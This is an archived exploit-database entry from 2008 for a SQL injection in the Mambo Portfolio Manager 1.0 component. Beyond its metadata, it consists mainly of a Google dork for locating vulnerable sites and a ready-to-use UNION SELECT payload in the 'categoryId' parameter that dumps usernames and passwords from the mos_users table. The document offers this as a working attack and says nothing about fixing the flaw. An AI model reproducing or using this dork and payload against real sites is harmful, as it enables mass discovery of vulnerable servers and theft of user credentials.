Mambo Component Portfolio Manager 1.0 - 'categoryId' SQL Injection

EDB-ID:

5139

CVE:

N/A

Author:

it's my

Type:

webapps

Platform:

PHP

Published:

2008-02-18

#########################################################
##
##  Mambo component Portfolio Manager 1.0 (com_portfolio)
##
##
##  Author: it's my
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_portfolio"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

#########################################################
## it's my sick world =/   ####    www.antichat.ru
#########################################################



    <name>portfolio</name>
    <creationDate>2005.09.15</creationDate>
    <author>Garry Malhi</author>
    <copyright>This component  is released under the GNU/GPL License</copyright>
    <authorEmail></authorEmail>
    <authorUrl></authorUrl>

    <version>1.0</version>
    <description>Portfolio Manager Component</description>

# milw0rm.com [2008-02-18]